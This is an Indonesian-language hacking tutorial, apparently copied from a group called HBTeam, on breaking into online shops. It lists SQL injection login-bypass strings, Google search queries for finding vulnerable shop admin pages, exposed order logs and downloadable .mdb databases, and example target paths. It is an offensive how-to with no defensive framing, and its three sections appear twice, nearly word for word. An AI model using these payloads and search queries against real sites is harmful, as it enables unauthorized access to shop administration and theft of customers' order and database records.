1. Teknik Dengan Menggunakan User & Password Admin Default – SQL Injection Basic
# Teknik ini menggunakan kelemahan dari SQL Injection String Login,
admin:’ or a=a–
admin:’ or 1=1–
user:’ or 1=1–
admin:’ or 1=1–
dsb
Contoh:
Silakan cari di google keyword: “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”
Misal target :
http://www.namasitusnya.com/shop/admin/shopadmin.asp
Silakan masukkan kombinasi kombinasi password yang telah saya sebutkan diatas, klo masuk berarti anda berhasil
2. Shopping Order Log – Informasi Log Order di Server
# Ini sangat mudah untuk di dapatkan, ada berbagai log yang tersimpan di berbagai server. Bisanya dalam bentuk *.log, *.rtf, *.txt, *.xls, dsb. Nah bagaimana mendapatkan informasi ini di web target. Itu tergantung dari imajinasi anda untuk menemukannya. Biasanya ini di server berbasis .cgi, .asp, .php, dsb.
Contoh:
Silakan cari di google keyword: “order.txt” or “order.log” or “order.asp” or “order.cgi”
atau inurl:order filetype:txt / inurl:order filetype:log dsb.
Misal target:
http://www.namasitusnya.net/shop/admin/log/order.log
http://www.namasitusnya.org/shop/order. ... /order.log
http://www.namasitusnya.la/shopping/DCS ... orders.txt
Selamat menemukan
3. Database Information – Database Source Location – Database Path
# Pada bagian ini, kita mendapatkan informasi lokasi database. Sehingga kita bisa mendownload database yang ada di server. Kebanyakan yang include di server .mdb.
Contoh:
Silakan cari di google keyword: “*.mdb” or “order.mdb” or “database.mdb”
atau menggunakan info DB: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb.
Misal target:
http://www.namasitusnya.com/shop/shopadmin/database.mdb
http://www.namasitusnya.org//cgi-bin/es ... /order.mdb
http://www.namasitusnya.com/fpdb/shop.mdb
http://www.namasitusnya.com/shopping/da ... oducts.mdb
Selamat mencari.. ^^
# Teknik ini menggunakan kelemahan dari SQL Injection String Login,
admin:’ or a=a–
admin:’ or 1=1–
user:’ or 1=1–
admin:’ or 1=1–
dsb
Contoh:
Silakan cari di google keyword: “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”
Misal target :
http://www.namasitusnya.com/shop/admin/shopadmin.asp
Silakan masukkan kombinasi kombinasi password yang telah saya sebutkan diatas, klo masuk berarti anda berhasil
2. Shopping Order Log – Informasi Log Order di Server
# Ini sangat mudah untuk di dapatkan, ada berbagai log yang tersimpan di berbagai server. Bisanya dalam bentuk *.log, *.rtf, *.txt, *.xls, dsb. Nah bagaimana mendapatkan informasi ini di web target. Itu tergantung dari imajinasi anda untuk menemukannya. Biasanya ini di server berbasis .cgi, .asp, .php, dsb.
Contoh:
Silakan cari di google keyword: “order.txt” or “order.log” or “order.asp” or “order.cgi”
atau inurl:order filetype:txt / inurl:order filetype:log dsb.
Misal target:
http://www.namasitusnya.net/shop/admin/log/order.log
http://www.namasitusnya.org/shop/order. ... /order.log
http://www.namasitusnya.la/shopping/DCS ... orders.txt
Selamat menemukan
3. Database Information – Database Source Location – Database Path
# Pada bagian ini, kita mendapatkan informasi lokasi database. Sehingga kita bisa mendownload database yang ada di server. Kebanyakan yang include di server .mdb.
Contoh:
Silakan cari di google keyword: “*.mdb” or “order.mdb” or “database.mdb”
atau menggunakan info DB: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb.
Misal target:
http://www.namasitusnya.com/shop/shopadmin/database.mdb
http://www.namasitusnya.org//cgi-bin/es ... /order.mdb
http://www.namasitusnya.com/fpdb/shop.mdb
http://www.namasitusnya.com/shopping/da ... oducts.mdb
Selamat mencari.. ^^
Sumber : HBTeam dan telah di modifikasi sebagian
